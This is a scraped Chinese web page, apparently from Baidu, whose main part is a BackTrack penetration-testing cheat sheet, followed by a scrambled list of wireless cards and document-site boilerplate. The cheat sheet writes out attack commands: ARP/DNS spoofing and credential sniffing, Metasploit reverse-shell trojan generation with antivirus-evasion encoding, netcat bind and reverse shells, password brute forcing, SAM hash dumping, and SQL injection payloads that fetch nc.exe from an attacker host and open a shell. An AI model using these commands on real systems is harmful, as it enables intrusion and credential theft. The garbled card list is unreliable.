backtrack的i攻击识别模块模块在哪

【BackTrack】whois 域名/ip 查看域名的详细信息。ping 域名/ip 测试本机到远端主机是否联通。dig 域名/ip 查看域名解析的详细信息。host -l 域名 dns服务器 传输zone。查询信息的网站:
扫描nmap:-sS 半开扫描TCP和SYN扫描。-sT 完全TCP连接扫描。-sU UDP扫描-PS syn包探测(防火墙探测)-PA ack包探测(防火墙探测)-PN 不ping。-n 不dns解析。-A -O和-sV。-O 操作系统识别。-sV 服务版本信息(banner)-p 端口扫描。-T 设置时间级别(0-5)-iL 导入扫描结果。-oG 输出扫描结果。
操作系统识别:p0f -i eth0 -U -p 开启混杂模式。xprobe2 ip|域名 检测os。
banner获取:nc ip port& 检测端口是否打开。telnet ip port& 检测端口是否打开。wget ip& 下载主页。cat index.html | more& 显示主页代码。q&& 退出。
windows枚举nmap -sS -p 139,445 ip& 扫描windows。cd /pentest/enumeration/smb-enumnbtscan -f targetIP& 检测netbios。smbgetserverinfo -i targetIP& 扫描name,os,组。smbdumpusers -i targetIP& 列出用户。smbclient -L //targetIP& 列出共享。
使用windows:net use&&&& /u:&"& 开启空会话。net view&&&&&&&&&&&&&&& 显示共享信息。smbclient:smbclient -L hostName -I targetIP 枚举共享。smbclient -L hostName/share -U && 用空用户连接。smbclient -L hostName -I targetIP -U admin普通用户连接。
rpcclient:rpcclient targetIP -U &&打开一个空会话。netshareenum& 枚举共享。enumdomusers& 枚举用户。lsaenumsid&&& 枚举域SID。queryuser RID 查询用户信息。createdomuser 创建用户访问。
ARP欺骗:ettercap:nano /usr/local/etc/etter.conf配置文件Sniff & Unified sniffing & Network interface: eth0 & OK& 设置抓包的网卡Hosts & Scan for hosts (do this two times)扫描网段的主机Hosts & Hosts list 显示主机列表Select the default gateway & Add to Target 1 添加主机Select the target & Add to Target 2 添加主机Mitm & Arp poisoning & Sniff remote connections & OK& 设置ARP攻击Start & Start sniffing 开始攻击dsniff -i eth0 监听网卡窃听登录用户密码urlsnarf -i eth0 嗅探http请求msgsnarf -i eth0 嗅探聊天软件的聊天内容driftnet -i eth0 网络管理嗅探图片,音频。
dns欺骗:nano /usr/local/share/ettercap/etter.dns编辑配置文件Plugins & Manage the plugins & dns_spoof 设置dns欺骗Mitm & Arp poisoning & Sniff remote connections & OK 设置ARPStart & Start sniffing 开始攻击
Exploits漏洞利用:cd /pentest/exploits/exploit-db 进入目录cat sploitlist.txt | grep -i [exploit] 查询需要的漏洞cat exploit | grep &#include&检查运行环境cat sploitlist.txt | grep -i exploit | cut -d & & -f1 | xargs grep sys | cut -d &:& -f1 | sort -u只保留可以在linux下运行的代码
Metasploit:svn update 升级./msfweb Web接口127.0.0.1:55555。../msfconsole 字符下的Console。help 帮助show &option& 显示选项search &name& 搜索名字use &exploit name& 使用漏洞show options& 显示选项set &OPTION NAME& &option& 设置选项show payloads 显示装置set PAYLOAD &payload name& 设置装置show options& 显示选项set &OPTION NAME& &option& 设置选项show targets& 显示目标(os版本)set TARGET &target number& 设置目标版本exploit 开始漏洞攻击sessions -l 列出会话sessions -i &ID& 选择会话sessions -k &ID& 结束会话&ctrl& z& 把会话放到后台&ctrl& c& 结束会话jobs&& 列出漏洞运行工作jobs -K& 结束一个漏洞运行工作show auxiliary 显示辅助模块use &auxiliary name& 使用辅助模块set &OPTION NAME& &option& 设置选项run& 运行模块scanner/smb/version 扫描系统版本scanner/mssql/mssql_ping 测试mssql是否在线scanner/mssql/mssql_login 测试登录(暴力或字典)Attacker behind firewall:& bind shell正向Target behind firewall:& reverse shell反向Meterpreter衔接不懂dos的可以用这个:db_import_nessus_nbe 加载nessus的扫描结果db_import_nmap_xml 加载nmap的扫描结果自动化攻击流程:cd /pentest/exploit/framework3./msfconsoleload db_sqlite3db_destroy pentestdb_create pentestdb_nmap targetIPdb_hostsdb_servicesdb_autopwn -t -p -e字符接口攻击流程:./msfcli | grep -i &name&./msfcli &exploit or auxiliary& S./msfcli &exploit name& &OPTION NAME&=&option& PAYLOAD=&payload name& E做木马后门等:./msfpayload &payload& &variable=value& &output type&S&&&&&&& summary and options of payloadC&&&&&&& C languageP&&&&&&& Perly&&&&&&&& RubyR&&&&&&& Raw, allows payload to be piped into msfencode and other toolsJ&&&&&&&& JavaScriptX&&&&&&& Windows executable./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X & evil.exe编码处理就是做免杀:./msfencode &options& &variable=value&./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &\x00& -l./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b &\x00& -e PexFnstenvMor -t c
入侵后在windows下添加管理员用户:hostname 查看主机名net users 查看用户net user 用户 密码 /add 添加用户net localgroup 查看工作组net localgroup administrators 查看管理员组net localgroup administrators x /add 将用户加入管理员组
TFTPcp /pentest/windows-binaries/tools/nc.exe /tmp/传递到tftp上tftp -i 10.1.1.2 GET nc.exe下载
netcat瑞士军刀attacker:& 10.1.1.1target:& 10.1.1.2nc -v -z 10.1.1.2 1-1024 端口扫描target:& nc -lvp 4444 聊天设置(服务)attacker:& nc -v 10.1.1.2 4444 聊天设置(客户)target:& nc -lvp 4444 & output.txt传输文件(接受)attacker:& nc -v 10.1.1.2 4444 & test.txt传输文件(发送)target:& nc -lvp 4444 -e cmd.exe& Bind shell。attacker:& nc -v 10.1.1.2 4444target:nc -lvp 4444& Reverse shell。attacker:nc -v 10.1.1.2 4444 -e /bin/bash
密码字典zcat /pentest/password/dictionaries/wordlist.txt.Z & wordscat words | wc -l显示个数(30多万个)暴力:hydra -l ftp -P words -v targetIP ftp 攻击ftp。hydra -l muts -P words -v targetIP pop3 攻击pop3hydra -P words -v targetIP snmp 攻击snmp攻击microsof VPNnmap -p 1723 targetIPdos2unix wordscat words | thc-pptp-bruter targetIPWYD:wget -r&&&accept=pdf 下载pdf文档wyd.pl -o output.txt&cat output.txt | moreSAM文件(windows下的密码文件):%SYSTEMROOT%/system32/config%SYSTEMROOT%/repair备份windows的hash文件:./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp Emeterpreter & upload -r /tmp/pwdump6 c:\\windows\\system32\\meterpreter & execute -f cmd -cmeterpreter & interact xC:\WINDOWS\system32& pwdump&john破解密码:cp hash.txt /pentest/password/john-1.7.2/run/cd /pentest/password/john-1.7.2/run/./john hash.txt彩虹表:rcrack *.rt -f hash.txt
本地修改密码:mountumount /mnt/hda1modprobe fusentfsmount /dev/hda1 /mnt/hda1mountls -l /mnt/hda1 挂载c盘bkhive /mnt/sda1/WINDOWS/system32/config/system system.txtsamdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt & hash.txt 备份sam文件直接修改sam文件:chntpw /mnt/sda1/WINDOWS/system32/config/SAMBlank the password.& *Do you really wish to change it?& yWrite hive files?& yunmount /mnt/sda1reboot
SQL 注入nmap -sS -p 1521 targetIP 扫描oraclenmap -sS -p T:1433,U:1434 targetIP 扫描mssql& or 1=1&验证旁路列举表名:& having 1=1&& group by table having 1=1&& group by table, table2 having 1=1&& group by table, table2, table3 having 1=1&列举列类型:union select sum(column) from table &union select sum(column2) from table &添加数据:& ; insert into table values(&value&,'value2&,&value3&)&MSSQL存储程序:输出数据库中备案信息到一个html文件,您可以查看与一个浏览器。& ; exec sp_makewebtask &c:\Inetpub\wwwroot\test.html&, &select * from table& ; &运行ipconfig在浏览器查看信息。& or 1=1; exec master..xp_cmdshell & &ipconfig& & c:\Inetpub\wwwroot\test.txt& ;&上传后门。& or 1=1; exec master..xp_cmdshell & &tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe& ; &攻击者:& nc -lvp 53
阅读(...) 评论()Backtrack 支持哪些网卡_百度知道
Backtrack 支持哪些网卡
acktrack 支持哪些网卡,能给个列表吗,4都无所谓? Backtrack3
4.3 ASUS WL-167G
+ 2.3.5 Foxconn WLL-3350
+ 2.4.12 Cisco AIR-PCM350
+ 2.12 D-Link DWL G122 (USB) F&#47.9 SMC SMCWPCI-G
o 2.2点击开始菜单(像windows的).14 Dlink DWA-645
+ 2.22 Gigabyte GN-WM01GT AirCruiserG Mach G
+ 2.4.4.31 NetGear WG511T
+ 2.5.4.4.5.5.4.4.5.29 NetGear WPN511
o 2.4.48 TP-link eXtended Range 54M Wireless Cardbus Adapter (TL-WN510G)
+ 2.4.5 IPW2200
+ 2.35 Netgear WG511U
+ 2.5。已确认可以支持的网卡
Wireless Cards And Drivers
* 2 Tested Card List
o 2.4.2.13 Cisco Aironet AIR-CB21AG-A-K9
+ 2.1.38 PROXIM ORiNOCO 802.14 Edimax EW-7317UG
+ 2.2 3COM 3CRPAG175B with XJACK Antenna
+ 2.5.47 TP-link SuperG&eXtended Range 108M Wireless Cardbus Adapter(TL-WN610G)
+ 2.8 Belkin F5D7051
+ 2.7 IPW3945
+ 2.2 Mini PCI (Built in)
+ 2.5 USB Dongles
+ 2.4.20 NetGear WG111T
+ 2.13 D-Link WUA-1340
+ 2.15 Dlink DWL-650+
+ 2.33 NetGear WG511 v1
+ 2.41 Senao SL-2511 CD PLUS (the one w&#47.10 Chiefmax
+ 2.4.42 Sitecom WL-100b
+ 2.4.4.1.21 Netopia ter&#47.4.11 DS High Rate
+ 2.4.3 Mini PCIe (Built in)
+ 2.5 Belkin F5D7050 V1
+ 2.4.4.46 SWEEX LW051 ver:1.1 Asus WL-138g v2
+ 2.2.1 Broadcom BCM;W A1
+ 2.7 Netgear WG311T
+ 2.2 ALFA Networks AWUS036H
+ 2.1 3COM 3CRWE154G72 v1
+ 2.5.2 Broadcom BCM.5.21 Enterasys Roamabout 802.11b&#47.4.1.4.49 Ubiquiti SRC
+ 2.44 SMC SMC2536W-AG
+ 2.5.32 NetGear WAG511v2
+ 2.30 NetGear WPN511 - Range Max
+ 2.4 ASUS WL100G
+ 2.4.17 Dlink DWL-G630.18 MicroEdge MEG55A Wireless-G USB Dongle
+ 2.43 SMC 2532W-B
+ 2.2.11b&#47.4.4.11 D-Link DWL 122 (USB) F&#47.52 ZCom XI-325HP+
+ 2.11a&#47.36 NetGear WPN511GR
+ 2.6 MSI PC60G
+ 2.2:N89-WE601l)
o 2.37 Netgear WPNT511
+ 2.4.15 Edimax EW-7318USG
+ 2.10 Belkin F5D7011
+ 2.5.5.2.19 NetGear WG111v2
+ 2.4.4.5;o external connectors)
+ 2.1.50 Wistron WLAN 802.5.24 ZyDAS 1211
+ 2.53 Zyxel ZyAIR G-100 PCMCIA Card (FCC ID.4.4!Wlan USB V1.24 Linksys WPC11v4
+ 2.4.16 Dlink DWL-G650
+ 2.4.17 Linksys WUSB54GC
+ 2.3 Dlink DWL-G520
+ 2.26 Linksys WPC54G v3
+ 2.4.8 Netgear WPN311
+ 2.27 Motorola WN825G v2
+ 2;W 2;b&#47.2.1 H&#47.8 WN360G
o 2.1.6 Belkin F5D
+ 2,最上边有backtrack项.4.4.1.4;g (rev 3)
+ 2.4.18 Dlink DWL-G650M
+ 2.16 Linksys WUSB54g v4
+ 2.5 Belkin F5D6020 v3
+ 2.2.4.25 Linksys WPC11v4
+ 2.4.5.4.34 NetGear WG511v2
+ 2;gusb-e
+ 2.20 D-Link WNA-1330
+ 2.11 Buffalo WLI-CB-G54HP
+ 2;g Gold (Model.9 Belkin F5D
+ 2.6 IPW3945
+ 2.11b&#47.39 Senao NL-2511CD PLUS EXT2
+ 2;g Cardbus CB9-GP
+ 2。网卡正确加载并初始化后.4 AVM Fritz.19 Dlink DWL-G650+
+ 2.1 Broadcom BCM.8 Belkin F5D
+ 2.2.6 Belkin F5D series)
+ 2.4 IPW2100
+ 2.3 AirLink101 AWLC4130
+ 2.5.1 Airlink101 AWLL3026
+ 2.25 SMCWUSB-G EU
+ 2.5.11b&#47.5.4.4.1;W 3: 8470-WD)
+ 2.5.5.5.26 MSI US54SE
+ 2.4.23 SafeCom SWMULZ-5400
+ 2.23 Lucent Technologies Orinoco Silver
+ 2.4.4.11abg NIC (rev 01)
+ 2.51 X-Micro WLAN 11g PCMCIA Card (XWL-11GPAG)
+ 2.4.40 Senao Sl-2511CD Plus EXT2
+ 2.3 IBM AR.9 Buffalo Airstation G54 WLI-U2-KG54-AI (2A)
+ 2.4.45 SMC WCB-G
+ 2.7 Belkin F5DUK
+ 2.4 PCMCIA Cards
+ 2.5.4.4 Dlink DWL-G510
+ 2.22 OvisLink Evo-w54usb
+ 2.5.2 Dlink DWL-AG530
+ 2.7 Belkin F5D7050B
+ 2.4,会有选择网卡的窗口出现.28 NetGear MA401
+ 2.5.1.5.5, 650+&#47
其他类似问题
为您推荐:
backtrack的相关知识
等待您来回答
下载知道APP
随时随地咨询
出门在外也不愁backtrack渗透测试中常用的命令总结_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
评价文档:
backtrack渗透测试中常用的命令总结
上传于||暂无简介
大小:7.86KB
登录百度文库,专享文档复制特权,财富值每天免费拿!
你可能喜欢明教教主的Backtrack 5 BT5手册_图文_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
明教教主的Backtrack 5 BT5手册
上传于||文档简介
&&明​教​教​主​的​B​a​c​k​t​r​a​c​k​  ​B​T手​册
阅读已结束,如果下载本文需要使用0下载券
想免费下载更多文档?
下载文档到电脑,查找使用更方便
还剩25页未读,继续阅读
你可能喜欢BackTrack中文指南V9_图文_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
BackTrack中文指南V9
上传于||暂无简介
阅读已结束,如果下载本文需要使用1下载券
想免费下载本文?
下载文档到电脑,查找使用更方便
还剩194页未读,继续阅读
你可能喜欢}

我要回帖

更多关于 i o模块 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信